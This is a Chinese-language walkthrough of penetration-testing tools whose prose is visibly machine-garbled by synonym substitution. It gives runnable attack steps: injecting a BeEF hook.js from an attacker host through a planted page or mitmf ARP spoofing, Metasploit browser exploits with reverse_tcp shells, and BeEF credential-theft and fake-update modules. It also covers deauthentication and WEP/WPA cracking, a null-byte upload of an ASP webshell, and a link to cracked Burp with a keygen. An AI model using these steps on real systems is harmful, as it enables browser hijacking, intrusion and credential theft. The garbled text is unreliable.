利用方法:
测试的IP为:163.177.151.110
Nmap的纯扫描
以下命令的语法如下:nmap <目标IP地址>个中:目标IP地址=您的目标机器的指定IP
NMAP普通扫描增加输出冗长(非常详细)以下命令的语法如下:nmap -vv 10.1.1.254个中:-vv =切换以激活日志所需的非常详细的设置
Nmap的自定义端口扫描Nmap的扫描范围从1-10000的端口默认情形下,为了更详细地指定要扫描的端口,我们将利用-p开关来指定我们的端口扫描范围,优点是它会更快扫描少量端口而不是预定义的默认值语法:nmap -p(范围)<目标IP>个中:-P是端口交流机(范围)是1-65535的端口数 <目标IP>是您的特定目标IP地址
该工具可以创建一个全面的网络虚拟舆图,并利用它来查明网络攻击者可以利用的所有紧张弱点。NMAP对渗透测试过程的任何阶段都很有用。最主要的是,它是免费的。
Netsparker Security Scanner下载地址:https://www.netsparker.com/web-vulnerability-scanner/
利用方法:
打开工具,点击start a new scan,选择full scan(全部扫描),单击开始在登录下进行扫描等待扫描结果,并剖析
可用的功能将帮助你确定该当利用的预先打包的漏洞,并且还许可你自定义它们;还可以利用IP地址和远程端口号配置它们。此外,还可以利用IP地址和本地端口号配置有效负载。然后,你可以在启动预期目标的漏洞之前确定要支配的有效负载。
Metasploit还集成了一个名为Meterpreter的工具,它可以在漏洞发生时显示所有结果,这意味着你可以绝不费力地剖析和解释结果,并更有效地制订策略。
BeEF下载地址:https://github.com/beefproject/beef
安装办法:
git clone git://github.com/beefproject/beef.git
cd beef
bundle install
ruby beef
利用办法:
修正配置文件/usr/share/beef-xss/config.yaml
(1)改vi beef侦听端口: http: port:3000(比如改为80)
(2)与Metaspolit关联:
metasploit: enable: false(改为true)
like:ssl: false(改为true)
(3) 配置一下拓展下的metasploit配置文件
vim /usr/share/beef-xss/extensions/metasploit/config.yaml
下面的路径为本机metasploit的路径。
然后开启metasploit的干系做事开启:# service postgresql start
在命令行下用msfconsole把掌握台打开
接着加载beEF,所用命令为:“load msgrpc ServerHost=127.0.0.1 Pass=abc123”
或者直接用这个命令启动:
msfconsole -x "load msgrpc ServerHost=127.0.0.1 Pass=abc123"
下面我们来启动beef
cd /usr/share/beef-xss/ && ./beef -x
为了方便,写个启动脚本
#!/bin/bashservice postgresql startmsfconsole -x "load msgrpc ServerHost=127.0.0.1 Pass=abc123"cd /usr/share/beef-xss && ./beef -x
接口掌握面板可以通过http://192.168.1.104:3000/ui/panel来访问
默认username/passwd是 beef:beef
掌握界面
默认hook js:http://192.168.1.104:3000/hook.js
默认hook页面: http://192.168.1.104:3000/demos/basic.html //访问即可被hook
好了,现在统统都已经准备好,让我们用php编写一个程序进行测试
vim /var/www/index.html
<html> <head> <script src="http://192.168.1.104:3000/hook.js"></script> </head></html>
如果是内网,也可以利用欺骗挟制勾住目标浏览器,比如利用mitmf(要以管理员权限运行)
mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --hsts --inject --js-url http://192.168.1.104:3000/hook.jsmitmf -i eth0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.129 --inject --html-url http://192.168.1.104:3000/demos/basic.html
钩住目标浏览器后,我们可以利用社会工程来利用户接管扩展。(Social Engineering中的模块)
比如:可以发送叫做:HTML5 Rendering Enhancements的扩展给用户,它会通过 1337 端口打开 shell。
还可以合营metasploit进一步获取权限。如:
use exploit/windows/browser/java_cmmset payload windows/meterpreter/reverse_tcp
天生url之后,注入目标浏览器中,进而在msf中获取shell
再比如这个模块
use exploit/windows/browser/ie_execcommand_uaf set SRVHOST 192.168.1.104set URIPATH /
我们我们可以看到每一个tab代表一个浏览器,它有5个tab-总结如下: Details-显示被hook的浏览器的细节。如上图所示 Logs-显示当前浏览器的log实体。如下图所示
commands-我们可以对一个浏览器实行模块。模块可以实行可以通过JavaScript来实行的任何命令。每一个模块有一个图标,表示为如下色彩:
Green : 可以事情; user不可见 Orange :可以事情; user可见 Grey : 可能事情 Red : 不能事情
一些实用模块:
Redirect Browser:进行重定向
方法:右侧填写木马的路径,可以合营插件升级攻击
Social Engineering --> Fake Flash Update
flash插件升级
Social Engineering --> Fake Notification Bar
功能类似插件升级
Social Engineering --> Clippy
Social Engineering --> Pretty Theft
盗取上岸凭据
Misc --> Create Invisible Frame
注入一个隐蔽的iframe框架
Metasploit实用姿势
利用Metasploit的Browser Autopwn功能天生一个浏览器攻击链接
use auxiliary/server/browser_autopwn
show options
set LHOST xxx
set SRVHOST xxx
set SRVPORT xxxx<br>run -z
利用"Create Invisible Iframe"模块加载autopwn页面
hook手机
由于手机打开网址持续的韶光很短,关闭当前页面后BeEF的shell就会下线,因此我们可以利用BeEF API,用户上线后能够自动实行批量命令,结合Persistence模块能够极大提高shell存活韶光。除了与windows系统干系的信息无法获取,其他操作均能成功实行,并且BeEF为手机挟制供应了专门的模块系列——Phonegap
以下是经测试可以在Android上利用的模块:
1、弹框2、重定向 3、查看是否访问过某些网站4、Creates an invisible iframe5、Social Engineering系列,如下图,仅作演示 6、msf系列7、NetWork系列,可以用来扫描同一内网下的windows主机
BeEF工具最适宜检讨Web浏览器,由于它紧张用于对抗web攻击。这便是为什么它最有利于移动的客户。此工具利用GitHub查找漏洞,此工具的最佳之处在于它探索了web边界和客户端系统之外的弱点。请记住,这是专门针对Web浏览器的,由于它会查看单个源高下文中的漏洞。它连接多个Web浏览器,许可你启动定向命令模块。
Wireshark下载地址:https://www.wireshark.org/download.html
利用方法:
1、打开wireshark 2.6.5,主界面如下:
2、选择菜单栏上Capture -> Option,勾选WLAN网卡(这里须要根据各自电脑网卡利用情形选择,大略的办法可以看利用的IP对应的网卡)。点击Start。启动抓包。
3、wireshark启动后,wireshark处于抓包状态中。
4、实行须要抓包的操作,如ping www.baidu.com。
5、操作完成后干系数据包就抓取到了。为避免其他无用的数据包影响剖析,可以通过在过滤栏设置过滤条件进行数据包列表过滤,获取结果如下。解释:ip.addr == 119.75.217.26 and icmp 表示只显示ICPM协议且源主机IP或者目的主机IP为119.75.217.26的数据包。
5、wireshark抓包完成,就这么大略。关于wireshark过滤条件和如何查看数据包中的详细内容在后面先容。
Wireshakr抓包界面解释:数据包列表区中不同的协议利用了不同的颜色区分。协议颜色标识定位在菜单栏View --> Coloring Rules。如下所示
该工具供应的最大上风是剖析结果的产生办法利用户轻松理解。渗透测试者可以利用此工具实行许多不同的操作,包括颜色编码,以便进行更深入的调查,并隔离最主要的单个数据包。在剖析基于Web的运用上发布到表单的信息和数据所固有的安全风险时,此工具非常方便。
w3af下载地址:http://w3af.org/download
利用方法:
root@bt:~# cd /pentest/web/w3af/root@bt:/pentest/web/w3af# ./w3af_console
0x04 漏洞扫描配置
w3af>>> plugins//进入插件模块w3af/plugins>>> list discovery //列出所有用于创造的插件w3af/plugins>>> discovery findBackdoor phpinfo webSpider //启用findBackdoor phpinfo webSpider这三个插件w3af/plugins>>> list audit //列出所有用于漏洞的插件w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss //启用blindSqli fileUpload osCommanding sqli xss这五个插件w3af/plugins>>> back//返回主模块w3af>>> target//进入配置目标的模块w3af/config:target>>> set target http://192.168.244.132///把目标设置为http://192.168.244.132/w3af/config:target>>> back//返回主模块
0x05 漏洞扫描
w3af>>> start
---New URL found by phpinfo plugin: http://192.168.244.132/New URL found by phpinfo plugin: http://192.168.244.132/checklogin.phpNew URL found by phpinfo plugin: http://192.168.244.132/index.phpNew URL found by webSpider plugin: http://192.168.244.132/New URL found by webSpider plugin: http://192.168.244.132/checklogin.phpNew URL found by webSpider plugin: http://192.168.244.132/index.phpFound 3 URLs and 8 different points of injection.The list of URLs is:- http://192.168.244.132/index.php- http://192.168.244.132/checklogin.php- http://192.168.244.132/The list of fuzzable requests is:- http://192.168.244.132/ | Method: GET- http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")- http://192.168.244.132/checklogin.php | Method: GET- http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="")- http://192.168.244.132/index.php | Method: GET- http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.Scan finished in 19 seconds.---//开始扫描
0x06 漏洞利用配置
w3af>>> exploit //进入漏洞利用模块w3af/exploit>>> list exploit//列出所有用于漏洞利用的插件w3af/exploit>>> exploit sqlmap //利用sqlmap进行SQL注入漏洞的测试
---Trying to exploit using vulnerability with id: [1010, 1011]. Please wait...Vulnerability successfully exploited. This is a list of available shells and proxies:- [0] <sql object ( dbms: "MySQL >= 5.0.0" | ruser: "root@localhost" )>Please use the interact command to interact with the shell objects.---//测试存在SQL注入漏洞//这里要记住shell objects(这里是0),等一下要用到0x07 漏洞利用w3af/exploit>>> interact 0//interact + shell object就可以利用了---Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shellw3af/exploit/sqlmap-0>>> ---//sqlmap的一个交互式模块w3af/exploit/sqlmap-0>>> dbs ---Available databases: [3]:
使W3AF成为一个完全工具的缘故原由是参数和变量可以快速保存到会话管理器文件中。这意味着它们可以快速重新配置并重新用于Web运用上的其他渗透测试,从而为你节省大量韶光,由于你不必在每次须要时重新输入所有参数和变量。此外,测试结果以图形和文本格式显示,使其易于理解。
Acunetix Scanner下载地址:http://www.downza.cn/soft/286127.html
利用方法:
1、选择“Tools Explorer”下的“Web Scanner”,鼠标右键涌现选项菜单,选择“ New scan”
弹出“Scan Wizard”扫描引导,输入您所要测试的网址
然后一贯点击下一步,如果要测试的网站是须要上岸才能进入的web,则配置一下上岸信息,点击“New Login Sequence”按照步骤一步一步上岸,让软件记录下你的登 录信息。完成之后连续next。
当涌现下图的操作时,则解释准备事情已经做好,点击“finish”按钮,可以开始扫描
扫描结束后如下图所示:
它涵盖了超过4500个弱点。登录序列记录器易于利用;它会扫描受密码保护的区域。该工具包含AcuSensor技能,手动渗透工具和内置漏洞测试。它可以快速抓取数千个网页,也可以在本地或通过云办理方案运行。
John the Ripper下载地址:https://www.openwall.com/john/
利用方法:
【命令列指令】
john [-命令列参数] [密码档名称]
【命令列參數】
参数:-single 解释:利用「大略」(Single Crack)破解模式解密,紧张是根据利用者的「账号」产生变革来预测解密,其变革规则记录在JOHN.INI档案的 [List.Rules:Single] 区域內。(稍后会再先容)
案例1:john -single passwd
参数:-wordfile:[字典档档名] -stdin
解释:利用「字典档」破解模式解密,由字典档内读取单字来破解;或是可以加上-stdin参数,代表由键盘输入单字来破解。
案例2:john -wordfile:bigdict.dic passwd
参数:-rules 解释:在「字典档」破解模式下,开启字词规则变革功能,如「字典档」读入单字cook,則开启字词变革下,程式可能会考试测验cook、c00k、 cooker、cook0…等其它字词。详细变革规则记录在JOHN.INI档案的 [List.Rules:Wordlist] 区域內。(稍后会再先容)
案例3:john -wordfile:bigdict.dic -rules passw
参数:-incremental[:模式名称](参数也可以简写成 -i[:模式名称])解释:利用「增强」破解模式解密,便是组合所有可能的资源当作密码来破解。在 JOHN.INI档案内的 [Incremental:] 区域里定义好许多的模式名称,可以指定利用哪一個模式来破解。(稍后会再介紹)
案例4:john -i:all passwd
参数:-external:[模组名称]解释:利用「外挂模组」破解模式解密,利用者可以自己撰写额外的「破解模组程式」。「破解模组程式」是记录在JOHN.INI档案內的 [List.External:] 区域内。
这是一个众所周知的工具,是一个非常优雅和大略的密码破解工具。此工具许可你确定数据库中的任何未知弱点,它通过从传统字典中找到的繁芜和盛行单词的单词列表中获取文本字符串样本,并利用与正在天生的密码相同的格式对其进行加密来实现此目的。大略而有效的John the Ripper是任何精心准备的渗透测试仪工具包中的一个强烈推举的补充。
Aircrack mainly下载地址:http://aircrack-ng.org/
利用方法:
Ifconfigwlan0 up 挂载无线网卡
Airmon-ngstart wlan0 激活无线网卡为监听模式
Airodump-ngmon0抓包
Airodump-ng –ivs –w shujubao –c 6 wlan0 抓包并保存
--ivs 这里是设置过滤,只保存用于破解的ivs文件,可以不加这个参数的,信道是多少写多少,一样平常是6,这个可以在抓包的时候看到,这一步可能会抓到好几个路由器的报文,选择自己要的便是了。
Airplay-ng -3 –b 目标MAC –h 客户端MAC mon0
-3是指采取arprequesr注入模式(后面会提到参数0)
等待一段韶光,详细等多少,便是等1000个以上的数据包吧,保险可以多等一会
Aircrack-ng shujubao-01.ivs 进行破解了,这种模式好破,当然拿windows下面破利用GPU加速更快。
Wpa加密破解:
前面都一样抓包的时候利用如下命令:
Airodump-ng -c 6 –w shujubao mon0
Aireplay-ng -0 10 –a 目标MAC –c 客户端MAC wlan0(参数与WEP有很大不同)
-0采取deauth模式,后面是次数,一样平常1次有效就好了。
屏幕上涌现了:WPA handshake解释抓到了握手包
Aircrack-ng –w dic shujubao-01.cap
这里面须要自己制作字典,建议在win下面破解,字典工具也多,自己做一个就好了。也可以扔到网站上破解,他们该当有超大的彩虹表吧,个人觉得对付繁芜的wpa2密码,这种办法不是很好用,运气不好,要破几个月也是有可能,当然我没有验证,Burp Suite Pen Tester
下载地址:https://pan.baidu.com/s/1mJdRZqSr5A0W9aWEcs3ySg 密码: 293x (压缩包内已包含注册机Loader)
运行Burp site,点击Proxy标签,确认Options选项卡下,Proxy listeners的running运行正常(勾选状态为运行),如果端口打开失落败,可能的缘故原由是有程序占用了该端口,点击edit,在local listener port:输入框输入一个未占用的端口,点击update即可。我这里将端口改为了8082
打开http://192.168.8.120/test/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg,进入上传页面,选择我们的asp木马,然后设置浏览器代理地址为127.0.0.1,端口为8082,点击开始上传,burp suite截获数据包,点击forward按钮,返回结果如图所示。
到这里所用到的数据包已经成功捕获,切换到history选项卡,右键刚刚捕获的post数据包,选择send to repeater。
变动filepath值”bookpic/”为”bookpic/shell.asp “(asp后有一空格),然后把filename的值”C:\Documents andSettings\Administrator\Desktop\unset.asp”改成”C:\Documents andSettings\Administrator\Desktop\unset.jpg”,Content-Length的值不用变动,程序会在提交要求的时候自动更新该值。
然后切换到hex选项卡,找到上传路径”bookpic/shell.asp “所处位置,把20改成00,然后点击GO,成功上传aspshell到http://192.168.8.120/test/bookpic/shell.asp。
此工具包含成功实行扫描活动和高等渗透测试的所有基本要素,使其成为检讨基于Web运用的空想选择,由于它包含用于剖析目标做事器和浏览器之间要求的工具。它通过在Java平台上利用Web渗透测试来实现。它可用于许多不同的操作系统,包括Windows,Linux和OS X.
